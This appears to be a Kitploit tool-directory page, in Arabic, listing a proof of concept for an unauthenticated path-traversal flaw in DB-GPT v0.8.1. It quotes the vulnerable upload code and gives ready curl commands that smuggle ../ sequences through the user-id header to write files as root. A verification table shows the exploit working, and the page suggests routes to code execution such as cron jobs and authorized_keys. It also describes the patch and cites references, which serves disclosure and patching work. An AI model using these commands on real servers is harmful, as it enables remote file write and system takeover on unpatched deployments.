Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-73034-PoC — CVE-2026-73034 — DB-GPT v0.8.1 اجتياز مسار بدون مصادقة → كتابة ملف اعتباطي بصلاحيات الجذر عبر ترويسة user-id. تم التحقق + فرق الإصلاح | Kitploit
أدوات/GitHubGitHub/boreas37/cve-2026-73034-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHubboreas37/cve-2026-73034-poc

CVE-2026-73034-PoC

CVE-2026-73034 — DB-GPT v0.8.1 اجتياز مسار بدون مصادقة → كتابة ملف اعتباطي بصلاحيات الجذر عبر ترويسة user-id. تم التحقق + فرق الإصلاح

عرض المستودع
143منذ 28 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-73034 — DB-GPT v0.8.1 اجتياز مسار غير مصادق عليه → كتابة ملفات تعسفية

CVSS 9.8 (حرج) · CWE-22 · GHSA/Issue #3104

الملخص

يأخذ POST /api/v1/python/file/upload في DB-GPT v0.8.1 ترويسة HTTP المسماة user-id ويستخدمها كخام كأحد مكوّنات المسار:

root@kitploit:~
upload_dir = os.path.join(base_dir, "python_uploads", user_id)
os.makedirs(upload_dir, exist_ok=True)
open(file_path, "wb")

لا يوجد أي مصادقة — وإذا كانت الترويسة غائبة، يتراجع التطبيق إلى user_id="001" مع role="admin". إن حقن متتاليات ../ في user-id يسمح بالخروج من جذر مجلد الرفع ويتيح يمكن لعملية الحاوية (الجذر) الكتابة إليه → مسار تنفيذ تعليمات برمجية مباشر ( في جذر الويب، مهام cron، ، …).

لمهاجم بعيد غير مصادق عليه كتابة ملفات تعسفية في أي مكان
.py
authorized_keys

المتأثر: DB-GPT ≤ v0.8.1 المُصحَّح: v0.8.2+ — الالتزام e0c741bd2b5e521b128cffb3f68982dde3f7b359 (يضيف قائمة بيضاء _SAFE_USER_ID_RE بالنمط ^[A-Za-z0-9_\-]+$، وفحوصات احتواء دليل الرفع، وإعادة فحص رابط رمزي TOCTOU).

الاستغلال

root@kitploit:~
# كتابة pwned.txt داخل /tmp/pwned/ على الخادم (بصلاحية الجذر)
curl -X POST "http://TARGET/api/v1/python/file/upload" \
  -H "user-id: ../../../../tmp/pwned" \
  -F "[email protected];filename=pwned.txt"

# الكتابة داخل /root/ (موقع تعسفي)
curl -X POST "http://TARGET/api/v1/python/file/upload" \
  -H "user-id: ../../../../root" \
  -F "[email protected];filename=pwned_root.txt"

ملاحظة: يقوم FastAPI بتعيين معامل user_id إلى ترويسة HTTP user-id (بواصلة، وليس بشرطة سفلية).

التحقق (2026-08-12، مختبر Docker، ARM64)

الاختبارالنتيجة
رفع تحكّمي (user-id: alice)✅ /app/python_uploads/alice/control.txt
الاستغلال user-id: ../../../../tmp/pwned✅ تمت كتابة /tmp/pwned/pwned.txt (بصلاحية الجذر)
الاستغلال user-id: ../../../../root✅ تمت كتابة /root/pwned_root.txt
البنية المُصحَّحة (e0c741bd)✅ HTTP 400 Invalid user_id: only alphanumeric characters, underscores and hyphens are allowed

البرنامج الكامل: poc_cve-2026-73034.sh (يشغّل كلا الاستغلالين + التحقق داخل الحاوية + مقارنة البنية المُصحَّحة).

المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-73034
  • الإصلاح: https://github.com/eosphoros-ai/DB-GPT/commit/e0c741bd2b5e521b128cffb3f68982dde3f7b359
  • القضية: https://github.com/eosphoros-ai/DB-GPT/issues/3104
  • المشروع: https://github.com/eosphoros-ai/DB-GPT
تنزيل الأداة